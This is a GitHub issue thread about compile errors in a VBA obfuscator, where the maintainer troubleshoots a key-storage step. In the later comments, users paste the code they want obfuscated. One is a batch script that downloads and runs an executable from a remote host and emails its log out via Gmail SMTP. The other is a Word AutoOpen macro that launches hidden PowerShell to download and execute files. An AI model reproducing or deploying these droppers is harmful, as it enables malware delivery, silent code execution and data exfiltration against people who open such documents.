### ISSUE TITLE
It doesn't run upon execution

### ISSUE THREAD

**Issue by goldpill1117** [bonnetn/vba-obfuscator#1]
It gives an error message saying Compile error: Invalid outside procedure.

**Comment by bonnetn** [comment]
Can you give us more details about the exception? 

When does it give you this error?

**Comment by goldpill1117** [comment]
Hello,

It gives en error saying compile error, invalid outside procedure.

The error points  ActiveDocument.Variables.Add Name="yW.......", the content of  "yW....." appears to be the problem.

By the way, nice work.

On Feb 6, 2019 4:40 PM, Nicolas Bonnet <notifications@github.com> wrote:

Can you give us more details about the exception?

When does it give this error?

**Comment by ghost** [comment]
It gives the error upon enabling macros, it points to an unrecognized syntax.

**Comment by bonnetn** [comment]
Hello,

As you can see in the README, the first lines are a bit special: 
![image](https://user-images.githubusercontent.com/36550428/52425233-da5a0000-2afb-11e9-97b9-ddeb287b131b.png)

The obfuscator stores the encryption key in a "Document variable", in the Microsoft Word document.

The first lines of the generated code includes the code to run to set this document variable.
You must run the 
`ActiveDocument.Variables.Add Name="[...]` line first when you create the document. It will put the key into the document variable (that is saved with your document, so you just have to run this once when you create your document).

Then remove these first lines and save your document with the rest of the code.

**Comment by ghost** [comment]
![capture](https://user-images.githubusercontent.com/47145252/52428998-0c497300-2ab8-11e9-8138-fc4da933cb58.PNG)

This after running it.
![capture2](https://user-images.githubusercontent.com/47145252/52433960-1e7cde80-2ac3-11e9-9b4e-e63a4dccbf50.JPG)

**Comment by bonnetn** [comment]
Interesting. Did you try running the obfuscator after commit e447e69ccf32985c5f4cd9a3fed90a13ab6559ac ? 

`docker pull bonnetn/vba-obfuscator` and re-run the script.

Maybe the line is too long.

**Comment by ghost** [comment]
Oh! no, I didn't, let me try that. I ran it using python, not docker though.

**Comment by goldpill1117** [comment]
Now, it doesnt obfuscate some blocks of code it should.

On Feb 8, 2019 5:58 PM, goldgoose1968 <notifications@github.com> wrote:

Oh! no, I didn't, let me try that. I ran it using python, not docker though.

**Comment by bonnetn** [comment]
Can you give me an example of a code that is partially obfuscated?

**Comment by goldpill1117** [comment]
@echo off

set downloadURL=http://192.168.8.103/Efiles/test.exe
set email=email@gmail.com
set password=password

set exeFile=%TEMP%\proc.exe
set logFile=%TEMP%\proclog.txt
set arguments=whatever


powershell (new-object System.Net.WebClient).DownloadFile('%downloadURL%','%exeFile%');
%exeFile% %arguments% > %logFile%

del %exeFile%

powershell $SMTPServer = 'smtp.gmail.com';$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);$SMTPInfo.EnableSsl = $true;$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('%email%', '%password%');$ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = '%email%';$ReportEmail.To.Add('%email%');$ReportEmail.Subject = 'Email Report';$ReportEmail.Body = 'email report.';$ReportEmail.Attachments.Add('%logFile%');$SMTPInfo.Send($ReportEmail);

del %logFile%


On Feb 10, 2019 8:14 PM, Nicolas Bonnet <notifications@github.com> wrote:

Can you give me an example of a code that is partially obfuscated?

**Comment by bonnetn** [comment]
This is only a batch file right? how do you put the code in your VBA script?

**Comment by goldpill1117** [comment]
I do not have internet access to get the right information across to you. On monday. I will send a sample of the code.

Thanks

On Feb 12, 2019 2:06 AM, Nicolas Bonnet <notifications@github.com> wrote:

This is only a batch file right? how do you put the code in your VBA script?

**Comment by ghost** [comment]
Sub AutoOpen()
    Dim cc As String
    cc = "powershell"
    cc = cc + "-NoP -NonI -W Hidden """
    
    cc = cc + "@('url1','url2')"
    
    cc = cc + "|foreach{$fileName=$env:temp+(Split-Path -Path $_ -Leaf);"
    
    cc = cc + "(new-object System.Net.WebClient).DownloadFile($_,$fileName);"
    
    cc = cc + "Invoke-Item $fileName;}"
    
    cc = cc + """"

    VBA.CreateObject("WScript.Shell").Run cc, 0

End Sub
